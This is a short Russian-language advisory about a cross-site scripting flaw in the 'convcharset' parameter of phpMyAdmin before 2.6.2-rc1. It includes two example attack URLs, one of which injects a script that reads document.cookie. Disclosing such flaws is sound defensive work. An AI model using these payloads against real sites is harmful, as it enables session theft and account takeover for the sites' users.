Программа: phpMyAdmin версии до 2.6.2-rc1

Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
получить доступ к важным данным других
пользователей. Уязвимость обнаружена при
обработке входных данных в параметре 'convcharset'.
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольный HTML сценарий в браузере жертвы
в контексте безопасности уязвимого сайта.

Примеры:

http://[target]/phpmyadmin/index.php?pma_username=&pma_password =&server=1&lang=en-iso-8859-1&convcharset=\"><script>
alert(document.cookie)</script>

http://[target]/phpmyadmin/index.php?pma_username=&pma_password =&server=1&lang=en-iso-8859-1&convcharset=\"><h1>
XSS</h1>

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии